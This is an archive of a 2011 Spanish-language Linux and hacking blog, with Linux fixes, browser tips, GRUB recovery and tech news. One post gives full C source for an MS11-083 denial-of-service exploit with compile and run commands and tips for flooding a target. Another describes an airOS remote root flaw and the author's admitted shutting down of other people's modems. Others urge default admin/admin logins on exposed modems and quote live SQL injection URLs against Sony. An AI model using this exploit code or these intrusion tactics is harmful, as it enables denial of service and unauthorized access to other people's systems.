HACK THE SYSTEM: 2011

RSS

 Seguime por RSS

31 dic 2011

Buscar archivos en Megaupload, mediafire y muchos mas.

Existe un buscador, para encontrar ESO que andás buscando y no encontrás, sin necesidad de usar taringa o portales de intercambio o linksharing, esto se llama:

http://www.uvrx.com/es/search-all.html

Puede buscar en la web, o en all (todos los host de archivos), la verdad, es muy muy util, les dejo un pantallazo para que se den una idea.


Bueno, espero les haya gustado, saludos.

30 dic 2011

Descubiendo las IP de un host y analizando la latencia - Bash Script

Debido a que a veces yo hacia todo de forma manual, para ver las IP de un mismo host y luego usar la mas rapida, como ser irc's, me di cuenta que (obviamente) era mucho mas practico hacer un script, asi que, aca esta el source, solo lo colocan en /usr/local/bin/ y le dan permisos con chmod +x o bien lo corren en su home ./pingtest previamente tambien dandole permisos con chmod +x pingtest (como root obviamente)

-------------------------------------------------------



#!/bin/sh
#Version 1.0
#GNU/GPL v3 or later
#Autor SynFlag:irc.freenode.net
unset host1
unset opcion1
clear
echo "Bienvenido al analizador de IP y tiempos de ICMP ver 1.0, solo analiza IPv4"
echo Ingrese el nombre de host para enviar sus IP a ips_nombredelhost.txt
read host1
nslookup $host1|grep Address: |cut --characters=10-24|grep -v "#" > ips_$host1.txt 2>/dev/null
echo "Desea ver las IP asociadas antes de hacer el ping test o prefiere seguir? s/N:"
read opcion1 2>/dev/null
if [ "$opcion1" = "s" ];then
        echo "Listado de IP:"
cat ips_$host1.txt|more
echo "Presione enter para continuar"
read
clear
while read linea
do
    ping -n -c1 $linea
done < ips_$host1.txt

else


echo "Ahora va a demorar dependiente de su conexión y/o la del host remoto el test, podrá ver la salida con los tiempos de ping y la IP"


while read linea
do
    ping -n -c1 $linea
done < ips_$host1.txt
fi
echo "Eso es todo, su listado de IP no será borrado, fue guardado con el nombre ips_$host1.txt"
unset host1
unset opcion1
exit 0

-----------------------------------------------------

Saludos, espero que les sirva y haya gustado.

Evitar que Chrome guarde cache | Prevent that Chrome save local cache

Google Chrome o Chromium, da igual a este caso, no poseen la conocida pestaña de privacidad de Firefox, donde se puede especificar que el tamaño de cache local sea de 0mb, o bien que al cerrar el navegador limpie toda la cache, sino que se debe ir a preferencias, historial, borrar datos desde el origen de los tiempos.
Cuando estamos diseñando o editando un sitio web, esto resulta engorroso a la hora de cambiar imagenes por FTP o HTTP o ssh, y tener que realizar ese metodo para que refresque la imagen nueva, a veces no lo hace, y me ha pasado un par de veces, imagino que a ustedes lectores tambien, de que modifican una imagen y no se refresca en todos los sitios al momento de cambiarla en su origen de URL.
Hay un metodo poco ortodoxo pero efectivo para solucionar esto, es decir, Chrome guardara el historial de sitios visitados, pero no la cache de imagenes, no al menos al cerrar el navegador, si dentro de la sesion obviamente.

Para hacer esto, hacemos lo siguiente.

1.- Nos loguemos como root, en ubuntu "sudo su" en terminal, en el resto de las distro su -
2.- cd /home/usuario/.cache/ (donde usuario es su usuario, pepe, juan etc)
3.- Una vez alli, hacemos esto:

cd google-chrome o google-chromium
cd Default
chattr -R +i
exit

Esto es todo, lo que hace chattr, con el parametro -R, es ser recursivo dentro de los directorios, y +i "inalterable", de esta forma, Chrome no podra guardar nada en su cache, y esto no genera errores en su funcionamiento ni lo afecta en nada.
Para volver todo como antes, repitan los mismos pasos pero con el parametro -R -i
Antes de hacer esto, no olviden vaciar todo desde el menu de Chrome, asi no quedan datos previamente guardados inalterables por mas que los querramos borrar.
En el caso de Windows, es el mismo procedimiento, solo que van a la carpeta de cache de Windows de Chrome, que es:



C:\ Documents and Settings \ "USUARIO" \ Configuracion Local \ Datos de Programa \ Google \ Chrome \ User Data \ Default \ Cache




ó




C:\ Documents and Settings\ "USUARIO" \ Local Settings \ Application Data \ Google \ Chrome \ User Data \ Default \ Cache




Haciendo click derecho sobre Default, cambian en permisos avanzados de carpeta, y ponen, no permitir cambios, de escritura ni lectura.

Eso es todo, espero les sirva como a mi.
Saludos.

PD: Al equipo de chrome, deberian incorporar esa caracteristica de Firefox, uso Chrome por temas tecnicos de mi equipo, pero no discuto la flexibilidad y configurabilidad de Firefox frente a Chrome.

28 dic 2011

airOS Full Disclosure - remote root 0day

Hace algunos dias, pude ver en seclist.org, un comentario sobre una falla en airOS, el OS de algunos devices DSL wireless, aprovechando una falla de lighttpd, se podia acceder a una interfaz gui, la cual deja ejecutar ordenes, subir y bajar archivos, ademas de aplicar chmod.
Paso algunas imagenes y a continuacion explico algo mas:



Bueno, ahora veamos un poco esto. El OS corre linux mips, con uclibc, y las cosas basicas.
El riesgo de esto, no es solo que puedan de forma remota reiniciar o apagar el modem, ademas de hacer un rf -rf /, sino que se puede subir un bot o shell usando netcat o ssh, para entre todos, conformar una botnet, meterlos en un irc, y dar ordenes de hacer DDoS, ademas de por ejemplo, plantar un sniffer de red y robar datos salientes de los clientes / usuarios / empresas que usan este modem.
La cantidad de cosas que se puede hacer es dependiendo de que:

Contamos con un kernel linux mips
uclibc
sh shell
root
sshd

El tema de esto, es que el mismo disclosure en seclist, se sugiere eso, programar un bot en C o ASM quiza, para subirlo y tener una botnet, y observe que algunas personas estaban usando estos modem con fines propios mas alla del PoC, asi me decidi a hacer esta entrada de blog y de paso ir apagando los modem para alertar de alguna forma a la gente que los este usando.
Esta falla se soluciona updateando el firmware a la version 5.3.5 terminada hace unos dias por ubiquity.


Reflexion:

A veces la seguridad no depende del OS que usemos, tampoco de las cosas que hagamos, el navegador, sino de dispositivos fisicos, como es este caso, donde uno se ve "atado" a su ISP, y nadie envia un mail desde el ISP avisando que tu modem puede estar formando parte de una botnet, cuantos devices mas habrá que tienen vulnerabilidades y aun no se sabe o no se mostro?, muchos.
Por mi parte, recomiendo que cada tanto actualicen el firmware de sus router, del modem si se puede y que chequeen todo lo posible desde fuera de su red, teniendo su numero de IP.

La fuente original del problema, se encuentra en esta URL:
http://seclists.org/fulldisclosure/2011/Dec/419

Saludos a todos, espero que tomen recaudos los que poseen estos aparatitos, proximamente version en ingles.

21 dic 2011

Villancico Linuxero


Aquí les dejo un villancico para todos los linuxeros y porque no para los mac y win users también, se van a dirvertir

24 nov 2011

Fedora 16 crashea las X usando preupgrade | Fedora 16 crash X using preupgrade

Bueno, si bien yo uso un clon de RHEL en mi laptop, en la desktop uso Fedora KDE spin, decidi actualizar de la version 15 a las 16 usando preupgrade, algo que no habia hecho antes, solia hacer instalaciones limpias, pero me anime a probar, y debo decir que no me fue bien, pero hay solucion.
Remarco que si bien es libre y muy romantico, nouveau me ha dado mas dolores de cabeza que alegrias desde que aparecio, preferia el viejo driver nv, si algun muchacho de Fedora lee esto, le pido que al menos en el boot menu de preupgrade o anaconda diga "usar modo vesa".
Todo iba bien, preupgrade bajo los paquetes, al reiniciar el grub dice "Actualizar a Fedora 16 verve", ok, tras varios intentos, veo que.. carga un driver de video, claramente se veia al iniciar porque las letras se veian bien, y al iniciar las X de anaconda, crash, y de los feos, un hardlock, ni al sysreq responde. Si bien es un bug reportado, esta reportado desde fedora 12,  y aun no se arregla, cuando van a entender (perdon que me ponga asi), que las placas nuevas como la GT240 no anda con nouveau?, algun dia?, espero que si.
Si te paso lo mismo que a mi, te queda darle al reset, y cuando esta por iniciar (si es que antes de eso desocultaste el menu de inicio y le diste al menos 3 segundos para elegir, sino podes hacerlo desde un liveCD, montar el /boot y en menu.lst de grub, comentar donde dice:

hiddenmenu y splashimage=(hd0,2)/boot/grub/splash.xpm.gz

quedando algo asi:


#boot=/dev/sda
default=0
timeout=3
#splashimage=(hd0,2)/boot/grub/splash.xpm.gz
#hiddenmenu

Salvan desde el liveCD y ahora comenzamos.
Ni bien inician, mueven la flecha para arriba o abajo, presionan 'e' sobre la opcion de actualizar a verne 16, luego se posicionan sobre la linea mas larga que es la primera, la carga del kernel, y van al final, con la tecla 'fin', y ahi tipean esto:

rdblacklist=nouveau blacklist=nouveau nomodeset nouveau.modeset=0 xdriver=vesa

Luego de eso, presionan 'enter', luego 'Esc' y vuelve al menú anterior, se posicionan sobre esa larga linea, y presionan la tecla 'b', de boot, entonces inicia anaconda y su instalador SIN cargar nouveau, luego que termina todo, solo falta agregar el modulo kmod o bien el .run de nvidia, eso es todo, espero les sea de utilidad.

Saludos

18 nov 2011

MS11-083 DoS/PoC exploit

Bueno, existe un PoC sobre un bug en sistemas windows*, que lo afecta de forma remota, y fue llamado el exploit de chuck norris, dado que solo el puede explotar un puerto cerrado, y es lo que hace este codigo, aunque no lo parezca. Ya fue parcheado, por la gente que posee servidores y pc hogareñas con licencia o bien crackeados, da lo mismo, el que no lo parcheo, le recomiendo que lo haga.
El efecto que produce es congelar la PC remota.
Consejos: Usen una conexion buena, por cable no wifi, y con un ancho de subida grande, sino los payload saturan la red, el codigo sigue corriendo y llena la ram como consecuencia.
Un video demostracion, y luego el codigo y como compilarlo en sistemas GNU/Linux claro.


Codigo:

* MS11-083 DoS/PoC exploit
* ========================
* This attempts to trigger the ICMP refCount overflow  
* in TCP/IP stack of Win7/Vista/Win2k8 hosts. This 
* requires sending 2^32 UDP packets to a host on a closed
* port, or 4,294,967,296 packets. A dereference function
* must be called that is not triggered via UDP but ICMP  
* echo packets. This exploit creates 250 threads and 
* floods a host with UDP packets and then attempts to
* trigger the de-ref using ping. I calculated that it
* would take approximately 52 days for the host to 
* enter a condition where this vulnerability is 
* triggerable. 
*
* -- prdelka 
*/
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/time.h>

int port;
int active = 0;
pthread_mutex_t mutexactive;
void *sendpackets(void *ptr);

int main(int argc, char *argv[]) {
      pthread_t thread;
      int iret,lthreads;
pid_t pid;
printf("[+] MS11-083 DoS/PoC exploit\n");
if(argc<3){
printf("[!] Usage : %s <server> <port>\n", argv[0]);
exit(1);
}
//char *const args[] = {"ping","-c","1",argv[1],NULL};
char *const envp[] = {"",NULL};
port = atoi(argv[2]);
for(lthreads=0;lthreads<250;lthreads++){//UDP flood 250
iret = pthread_create(&thread,NULL,sendpackets,argv[1]);
printf("[-] Thread number %d started\n",lthreads);
sleep(1);
}
printf("[-] One does not simply barrel roll into Mordor\n");
while(active){
pid = fork();
if(pid==0){// trigger deref.
execve("/sbin/ping",args,envp);
};
sleep(15);
}
printf("[-] You are finished. Patience is a virtue.\n");
exit(0);
}

void *sendpackets(void *ptr)
{
int sd, rc, n, echoLen, flags, error, timeOut;
unsigned long i;
struct sockaddr_in remoteServAddr;
struct hostent *h;
char str[41];
pthread_mutex_lock(&mutexactive);
active++;
pthread_mutex_unlock(&mutexactive);
    srand(time(NULL));
    for (i = 0;i < 40;++i){
str[i] = (char)((rand() % 78) + 30);
    }
    str[40] = '\0'; // yes this was off-by-one. :(
printf("[-] Sending payload '%s'\n",str);
  h = gethostbyname(ptr);
if(h==NULL) {
    printf("unknown host '%s' \n",(char*)ptr);
    exit(1);
  }
remoteServAddr.sin_family = h->h_addrtype;
memcpy((char *) &remoteServAddr.sin_addr.s_addr,h->h_addr_list[0], h->h_length);
remoteServAddr.sin_port = htons(port);
sd = socket(AF_INET,SOCK_DGRAM,0);
if(sd<0){
printf("[!] Cannot open socket\n");
pthread_exit((void*)0);
}
flags = 0;
for(i=0;i<4294967295;i++){
rc = sendto(sd,str,strlen(str)+1,flags,(struct sockaddr *)&remoteServAddr,sizeof(remoteServAddr));
if(rc<0){
printf("[!] Cannot send data\n");
      close(sd);
pthread_exit((void*)0);
    }
}
pthread_mutex_lock(&mutexactive);
active--;
pthread_mutex_unlock(&mutexactive);
pthread_exit(NULL);
}

Salvan eso como, win.c por ej, abren una terminal, tipean:

# gcc -o win_nuke win.c -lpthread
#./win_nuke IP port

Recuerden que debe ser un puerto cerrado.
Saludos.
PD: No me hago responsable por el mal uso que se haga de este codigo, el uso del mismo queda bajo responsabilidad de cada usuario que lo compile y use, desligando de toda responsabilidad al autor de este blog.


9 nov 2011

emesene no conecta | emesene can't connect

Bueno, hace unos dias emesene 1.x y 2.x no conectan, lo mismo kmess y otros, el tema es que muchos como yo usamos la version 1.6.3 conocida como uberlandia, y el parche se dio en la version 2 en el blog de emesene, para los que usamos la 1.6.3 solo cambiamos unas cosas, eso es todo, pasos a seguir:

1.- Se loguean como root (si no sabes que es eso, en tu sistema que uses busca como se hace, veras el prompt del sistema con #), en una terminal que elijas, recomiendo que sea grafica (gnome-terminal, lxterm, roxterm, konsole)
2.- gedit /usr/share/emesene/emesenelib/soap/templates.py
3.- En gedit, presionan ctrl+h, que es reemplazar
4.- En "buscar", colocan esta cadena "contacts.msn.com" (sin las comillas claro)
5.- En "Reemplazar por", esta otra "local-bay.contacts.msn.com"
6.- Presionan "Reemplazar todo"
7.- Archivo, guardar y cierran

Ahora, repiten EL MISMO procedimiento con /usr/share/emesene/emesenelib/soap/requests.py

1.- su, o sudo su
2.- gedit /usr/share/emesene/emesenelib/soap/requests.py
3.- Buscan y reemplazan la misma cadena mencionada en el punto 4 y 5 anteriores
4.- Graban y salen

Listo, eso es todo, ahora pueden iniciar emesene 1.6.3 sin problemas

4 nov 2011

Fix Emesene 1.6.3 bloquear contactos | Linux - Fedora y RHEL

Actualmente usando RHEL 6.1 o derivados (clones, tambien otras distro enterprise), encontramos que el unico IM para la red MSN es pidgin, teniendo este desventajas claras que no voy a enumerar en todo el post, solo dire que los password locales se guardan en texto plano.
Daré el ejemplo para mi caso, SL6.1
Primero que nada, procedemos a instalar emesene 1.6.3 usando el rpm de Fedora 15, esto es, para i686 o para x86_64, por ej:

ftp://ftp.muug.mb.ca/mirror/fedora/linux/releases/15/Everything/i386/os/Packages/emesene-1.6.3-3.fc15.x86_64.rpm

ftp://ftp.muug.mb.ca/mirror/fedora/linux/releases/15/Everything/x86_64/os/Packages/emesene-1.6.3-3.fc15.x86_64.rpm

Luego de que bajen el rpm, lo instalan usando rpm, no yum, dado que va a pedir una dependencia que no necesitamos, asi que hacemos:

rpm --nodeps -ivh emesene-1.6.3-3.fc15.x86_64.rpm

Y eso es todo, ahora bien, notaran una falla en 1.6.3, que en algunas cuentas, sino todas, al bloquear un contacto el mismo se desbloquea a los segundos de forma automatica, bueno, hay un fix para ello, y es el siguiente, logueados como root, editan /usr/share/emesene/emesenelib/ProfileManager.py, y comentan (#) las lineas:


609
610
611
612
613
644
645
646
647


(Eso arregla el problema del bloqueo y desbloqueo fallido de contactos)

Salvan y listo, ahora emesene si bloquea.
Porque no usar el 2 desde git?, bueno, a ver le encontre mil errores y fallas, desde que se crashea la GUI haciendo X cosas, hasta que tiene mensajes de error con el nuevo protocolo de MSN, asi que el 1.6.3 con este retoque, a mi parecer es el mejor.

Nota: El fix para los contactos es aplicable a todo GNU/Linux

Saludos

29 ago 2011

lsusb.py existe?, si, arreglemoslo! - Fedora

Existe un comando llamado lsusb.py ademas del conocido lsusb, que nos proporciona una salida de los devices USB, su ID y el consumo en tiempo real en amperes de cada puerto, pero tiene un pequeño bug, vamos a arreglarlo para poder usarlo como se debe.
Primero que nada veamos la salida normal como viene por defecto:


lsusb.py
 WARNING: Failure to read usb.ids
(<type 'exceptions.IOError'>, IOError(2, 'No such file or directory'),
<traceback object at 0xb76eea04>)
usb1            1d6b:0002 09  2.00 480MBit/s   0mA 1IFs (ehci_hcd 0000:00:1d.7) hub
1-6            17ef:1000 09  2.00 480MBit/s   2mA 1IFs () hub
usb2            1d6b:0001 09  1.10  12MBit/s   0mA 1IFs (uhci_hcd 0000:00:1d.0) hub
usb3            1d6b:0001 09  1.10  12MBit/s   0mA 1IFs (uhci_hcd 0000:00:1d.1) hub
usb4            1d6b:0001 09  1.10  12MBit/s   0mA 1IFs (uhci_hcd 0000:00:1d.2) hub
usb5            1d6b:0001 09  1.10  12MBit/s   0mA 1IFs (uhci_hcd 0000:00:1d.3) hub


Ahora, veamos la salida fixeada:


lsusb.py

usb1 1d6b:0002 09 2.00 480MBit/s 0mA 1IFs (ehci_hcd 0000:00:1d.7) hub
1-6 17ef:1000 09 2.00 480MBit/s 2mA 1IFs (Lenovo) hub
usb2 1d6b:0001 09 1.10 12MBit/s 0mA 1IFs (uhci_hcd 0000:00:1d.0) hub
usb3 1d6b:0001 09 1.10 12MBit/s 0mA 1IFs (uhci_hcd 0000:00:1d.1) hub
usb4 1d6b:0001 09 1.10 12MBit/s 0mA 1IFs (uhci_hcd 0000:00:1d.2) hub
usb5 1d6b:0001 09 1.10 12MBit/s 0mA 1IFs (uhci_hcd 0000:00:1d.3) hub


Cual es el fix?, facil, el comando lsusb.py que no es mas que un python script, hace una llamada a usb.ids a /usr/share, donde el archivo no existe, entonces, como root hacemos:

cp /usr/share/hwdata/usb.ids /usr/share/usb.ids

Eso es todo.

Respuesta a un "anonimo"

Por lo visto aun en estos dias hay gente que aun se esconde detras de un teclado, en el anonimato de una  PC, yo creia que eso pasaba solo en el under elite hack, pero no señores, esto pasa tambien con los n00b trolls.
Paso a postear un comment que me llego de un "anonimo", para asi responderle y que no crea que soy tan cobarde como el.

"Anónimo ha dejado un nuevo comentario en su entrada "La incompetencia de los developers de ArchLinux ex...":

Pero usando Gnome o KDE o XFCE te queres hacer el geek? y ahora usando Fedora? haha.. vos sos un loser, no es que arch sea buenisima, ninguna distro lo es, pero la verdad, tenes infulas de grositud y sos de madera... tomatela .. ya te vere escribiendo que Fedora sucks o que Debian sucks haha."



Bueno, mi querido anonimo, voy a responderte por partes.
Yo no me describí como un Geek, tampoco como otra cosa, esos titulos deben ponerlo los demás, si a ti te parece que haces bien en ponerte un titulo de algo, esta bien por ti pequeño lammer.
Por mi lado, creo que usar gnome, KDE, xfce, ratpoison, dwm, wmii o lo que sea, no te hace ni mas ni menos experto.
En mi trabajo a diario, no uso nada, solo ssh y la terminal, ella y yo, asi que, en que lado entraría?.
Fedora es una distro despreciada por muchos, pero porque no saben usarla.
Es el RHEL dekstop, ni mas ni menos, RHEL6.1 es el producto de Fedora 12&13.
Fedora es la distro que soporta kernel.org, puedes mirarlo en netcraft.
Lo "groso" como dices tu, muy poco acorde con la RAE, no se mide por la distro o el desktop, o el windows manager, sino por la capacidad de entender, razonar, solucionar y parchear, algo que dudo poseas.
"Loser"?, bueno, no creo que trabajar donde lo hago sea para un perdedor pero esta bien si te hace feliz pequeño usuario de garchilinux.
Debian no sucks, ArchLinux Sucks, y dentro de poco, mal que te pese, voy a revelar mas sobre esta distro, que poco va a gustarle a sus developers y usuarios, como a ti, pero que puedo hacer?, mi conocimiento es mas fuerte que yo.
Por ultimo, la madera reporta bugs de seguridad en redhat?, soluciona problemas de kernel en Debian?, no lo creo, saludos, cyber tonto.

IPtraf Fedora 15 Warning: unable to tag this process

Bueno, algunos habran tenido este bug en fedora 15, y han creado el directorio /var/lib/iptraf o bien /var/run/iptraf sin resultados positivos.
Segun nos dice el manual de IPtraf y el strace, iptraf esta intentando crear un archivo llamado iptraf.tag en /var/lock/iptraf/, el cual no existe y no se crea en la instalacion, seguramente un problema del armado de los script del rpm.
Asi que hacemos mkdir -p /var/lock/iptraf
Listo, ya tenemos nuestro IPtraf sin bug.
Enjoy.

8 ago 2011

Mejorar rendimiento de Firefox o Iceweasel

Bueno, aqui os dejo unos tip para mejorar el rendimiento de Firefox o Iceweasel:

Primero que nada desactivamos el plugin container:

about:config en la barra de navegacion:

Buscamos el valor: dom.ipc.plugins.enabled

Damos Doble Click y quedará en false.

-----------------------------------------------------------------------------------------

Abrimos el navegador, en la barra de busqueda colocamos about:config
Nos dirá que podemos romper algo, ok, le decimos "tendre cuidado"
Ahora, en la busqueda o filtro, pegamos este valor:

network.http.pipelining

Le damos doble click y de False pasará a True.

Debajo del mismo, tenemos uno llamado:

network.http.pipelining.maxrequests

Damos Doble Click y el valor que viene es 4, pues ponemos 32 y damos aceptar.

Luego buscamos este valor:

network.http.proxy.pipelining

Y cambiamos de la misma forma, su valor de False a true.

Ahora vamos a crear un par de valores que no existen, ok?, siganme al pie de la letra.

Click derecho sobre la pagina central donde estan los valores, ponemos nuevo >> Logico >> y tipeamos este nombre:

network.http.pipelining.firstrequest

Al darle aceptar nos pedira un valor, le ponemos true.

Ahora, creamos otro, pero Entero:

Nuevo valor > Entero y ponemos este nombre:

nglayout.initialpaint.delay

Enter y los pedira un valor, colocamos 0 y aceptamos.

Cerramos el Firefox o iceweasel, y entramos a paginas pesadas con muchas imagenes como taringa o cosas asi y ya no se colgara el firefox, sobre todo en PC viejitas.

6 jul 2011

Haciendo nada encontre algo...

Buscando fallas en la red de un amigo que posee telecom corporativo mediante un modem Xav! encontre que al poner en google el modelo salen muchos modem, y algunos, por no decir la mayoria, dejan el default pass como admin admin, divertanse:

X3402A3

3 jul 2011

Consecuencias graves de la compra de Skype por parte de Microsoft | Escuchas y grabaciones en la red Skype, hasta donde piensa llegar EEUU?

Es sabido que Microsoft es una de las empresas que trabaja para los servicios de inteligencia de Estados Unidos, tales como CIA, FBI.
Asi como Facebook lo hace, ellos tambien y hace muchos años.
Algunos antecedentes son los backdoor en Windows XP, y las versiones modificadas de XP que se enviaron a los paises arabes para tener registro de la actividad.
Como retribucion, cada dia el gobierno de Estados Unidos le da mas chances a Microsoft para convertirse en el nuevo Darth Vader.
Con eso me refiero que hasta no hace mucho, el gobierno de Estados Unidos, vivia acusando, con razon, a Microsoft por actividades monopolicas, como IE, Bing y tantas otras, y en estos ultimos años, donde M$ se comporta bien con el gobierno dandole informacion, no ha recibido ni un solo tiron de orejas por la compra de Skype, negocios con Nokia, Nvidia y tantos otros negociados con empresas amigas para destruir Sun y sus productos, asi como perjudicar al mundo GNU/Linux, sospechoso no?.
La mala nueva, es que ahora M$ patenta un sistema para grabar todo el contenido que circule por la red de Skype, en busca de terroristas, segun se alega, pero momento.... no posee ya EEUU Echelon?, para que mas?, no sera que esto es solo un tema de M$ ?, se sabe que los terroristas no usan Skype, sino la gente, que pasa con el cyber espionaje militar?, o las empresas... tecnologias.... tantas cosas... controlar paises segun las charlas que se mantienen entre sus pobladores, bah, despues de lo de wikileaks, nada me extraña del pais del norte, que como nos demuestra, la guerra fria no ha terminado, pero ahora el enemigo no es Russia ni la CCCP, somos todos lo que no habitamos su suelo y pensamos como ellos, terrible no es verdad.
Microsoft grabará de forma legal las llamadas de voz y vídeo de Skype para ampliar las posibilidades de seguimiento de conversaciones delictivas terroristas en línea. Microsoft ha patentado «Legal Intercept», una tecnología que le permitirá interceptar y monitorizar de forma legal llamadas de voz y vídeo de Skype, servicio que adquirió en mayo por 8.500 millones de dólares. Microsoft la describe como una herramienta similar a la que las empresas de telecomunicaciones utilizan para cumplir con las exigencias gubernamentales en materia de seguridad.Skype pasa de este modo a entrar en el CALEA(Communications Assistance for Law Enforcement Act), que hace a las empresas de tecnologías de la comunicación puedan ser controladas, siempre por motivos de seguridad y de estado.A pesar del fin de «Legal Intercept» que ha explicado el gigante de Redmond, la patente ha generado cierto temor entre los internautas en materia de privacidad, como se puede observar en diversos blogs y foros, además de en Twitter, donde abundan los mensajes de alarma.

14 jun 2011

Lulzsec hackea senate.gov | El senado de estados unidos de norteamerica

Ver archivo aqui: Descargar TXT

Ese es el contenido de senate.gov, un sun sparc... ustedes creen que solo hicieron un df -h ?, no, pero esto es mejor que wikileaks!.
La seguridad no existe y se vuelve a probar una vez mas.

Exponen contraseñas de 26 mil sitios para adultos

Este resumen no está disponible. Haz clic en este enlace para ver la entrada.

13 jun 2011

Recuperar grub2 teniendo en distintas particiones /boot y /

Me vi obligado a recuperar grub2 en una pc que tenia Linux Mint y le habian instalado Windows 7 luego, asi que borraron el MBR. Como encontre que todos los tuto estan mal, o solo hablan de tener una particion unica para todo Linux y muchos tenemos, como corresponde, el /boot apartado en ext2, decidi compartir como se hace correctamente. Esto es valido para Mint, Debian, Ubuntu, Fedora (usando grub legacy), ArchLinux, Gentoo, etc.

1)Booteamos en un LiveCD con Mint o Ubuntu o algo que posea grub2.
2)Ejecutamos esto al pie de la letra =>
-----------------------------------------------------------------------------
Abrimos un terminal
Ponemos sudo su para hacernos root si es que no lo somos.
fdisk -l para ver la particion de /boot y / en los /dev/sdaX

Luego:

mount /dev/sdaX /mnt (donde X es la particion /)

(Reemplazamos el /dev /dev/pts /proc y /sys por nuestro sistema virtual para luego hacerle un chroot y que quede completo)

mount --bind /dev /mnt/dev 
mount --bind /dev/pts  /mnt/dev/pts
mount --bind /proc /mnt/proc
mount --bind /sys  /mnt/sys

chroot /mnt   (cambiamos el / del live por nuestro / del disco ojo que todo lo que toquen cambiara el sistema instalado)

mount /dev/sdaX /boot   (donde X es el /boot real del disco, que previamente vimos con fdisk -l

grub-install --recheck /dev/sda (instalamos grub en el MBR)
update-grub2 (al estar en chroot mode, el / es nuestro sistema real, asi que genera un grub.cfg y detecta los sistemas Linux y Windows)

Resultado:

Generating grub.cfg ...
Found background image: linuxmint.png
Found Debian background: linuxmint.png
Found linux image: /boot/vmlinuz-2.6.38-2-686
Found initrd image: /boot/initrd.img-2.6.38-2-686
Found linux image: /boot/vmlinuz-2.6.32-5-686
Found initrd image: /boot/initrd.img-2.6.32-5-686
Found Windows 7 (loader) on /dev/sda1
done


Nota, para los que se pregunten que es --bind:

The bind mounts.
              Since Linux 2.4.0 it is possible to remount part of the file hierarchy somewhere else. The call is
                     mount --bind olddir newdir
              or shortoption
                     mount -B olddir newdir
              or fstab entry is:
                     /olddir /newdir none bind

              After  this  call  the same contents is accessible in two places.  One can also remount a single file (on a
              single file).

              This call attaches only (part of) a single filesystem, not possible submounts. The  entire  file  hierarchy
              including submounts is attached a second place using
                     mount --rbind olddir newdir
              or shortoption
                     mount -R olddir newdir

              Note  that the filesystem mount options will remain the same as those on the original mount point, and can‐
              not be changed by passing the -o option along with --bind/--rbind. The mount options can be  changed  by  a
              separate remount command, for example:

                     mount --bind olddir newdir
                     mount -o remount,ro newdir

7 jun 2011

Inteligente cláusula de Microsoft le da control sobre Nvidia

En el año 2.000 Microsoft firmó un acuerdo con Nvidia para permitir que procesadores Nvidia estuvieran presentes en la consola Xbox, a cambio de esa concesión Nvidia le entregó su control de venta a Microsoft. Si una empresa desea comprar más del 30% de Nvida, Microsoft tiene derecho a vetar la compra y a presentar una mayor oferta. Vale la pena recordar que en este momento la mayoría de las tabletas digitales usan procesadores Nvidia y que Microsoft acaba de terminar su eterno matrimonio con Intel conocido como Wintel, al anunciar que de ahora en adelante sacará versiones de Windows 8 para ambos procesadores Intel –AMD y Nvidia ARM.

5 jun 2011

Revelado parte del código fuente de Skype

Lo cierto es que Microsoft no ha tenido un buen comienzo en su aventura en el mercado de la VoIP. Tras la compra de Skype, aparecieron por todo el mundo problemas de ingreso por parte de muchos usuarios; tras esto, Microsoft debe hacer frente a algo más peligroso aún como es la revelación de parte del código fuente de la famosa aplicación VoIP por la que tanto dinero ha pagado. Vaya modo de arrancar…


Efim Bushmanov, un programador ruso, ha conseguido parte del código fuente de Skype mediante ingeniería inversa.

Huelga decir que, más allá de las implicaciones legales y consecuencias económicas de este asunto, la revelación de parte del mencionado código puede representar una oportunidad para crear opciones alternativas libres. De hecho, es precisamente lo que desea este programador (y muchos otros, claro).

Skype protocol reverse engineered, source available for download

Con un par… Así de explícito y claro anuncia Efim en su blog http://skype-open-source.blogspot.com/ la disponibilidad del código para cualquier interesado, que los habrá y a montones.

os interesados pueden dirigirse a ese blog, descargarlo vía torrent (http://thepiratebay.org/torrent/6442887) o enhttps://github.com/skypeopensource/skypeopensource/downloads

PBS, Sony, Fox Websites Hacked By LulzSec's Lulz Boat, AT&T Next?

A new group of web pirates is making itself known, as it sails the high seas of The Internet in search of what it describes on Twitter as #fun #fun #fun.
The Lulz Boat, or what the group really calls itself: LulzSec, has hacked into the websites of PBS, Sony, and Fox, in reverse order over the last two months - and AT&T appears to be next on their list.
The Sony Hacks
The series of Sony hacks (not just one), and reported to be the largest in Internet history, caused the Japanese icon to shut down its PlayStation servers for a month. And LulzSec left this tweet:
LOL @Sony, nice Japanese website dumbasses: http://pastebin.com/NyEFLbyX
Which leads to this message containing the Sony website pages that contains two links to Sony's database structure:
@LulzSec was here you sexy bastards!
This isn't a 1337 h4x0r, we just want to embarrass Sony some more. Can this be hack number 8? 7 and a half?!
Stupid Sony, so very stupid:
SQLi #1: http://www.sonymusic.co.jp/bv/cro-magnons/track.php?item=7419
SQLi #2: http://www.sonymusic.co.jp/bv/kadomatsu/item.php?id=30&item=4490
(two other databases hosted on this boxxy box, go for them if you want)
And LulzSec does it all with the interesting tagline "Laughing at your security since 2011!"
And that seems to be the point of their hacks: taking advantage of apparent and simple gaps in system design. The LulzSec refers to the "seven processes" in their Twitter account, as if they were the "seven seas" that pirates would sail on.
But by "seven processes," and linked to reference to their actions as being pirate boat attacks, then the "seven processes" seems to be the approaches they use to enter a website and database.
The SQL Injection Method
Generally, what LulzSec seems to be doing is using something called The SQL Injection Method.  What this is starts with the use of the "Structured Query Language," or SQL programming approach, like C, or HTML, or any other language, but that is used to create managing data in a website's database. The technique of "convince the application to run SQL code that was not intended," is described in detail at Steve Friedl's website at unixwiz.net, where he provides a way to "mitigate" against such approaches as the ones used by The LulzSec. You can see that with a click and scroll here: FIX.
Tupac and LulzSec Fame
The LulzSec group gained recent fame by hacking into the PBS website and posting a report that legendary rapper Tupac Shakur is "alive and well" in New Zealand, along with Biggie Smalls, aka The Notorious BIG.
Which is interesting, because history tells us of a feud between them that resulted in their deaths. But I digress.
Why PBS?
Reportedly, The LulzSec hacked into the PBS website because of the public television giant's Frontline programs on Wikileaks and Private Bradley Manning. But personally, I don't think that's the reason: LulzSec just did it because PBS was vulnerable. So, they hacked in, made up a reason for the action after it was successful, then turned their attention to Tupac and Biggie.
Think about it.  Why would a group announce it was going to hack into a website and state its motives before the action unless they had reason to believe they were going to be successful?
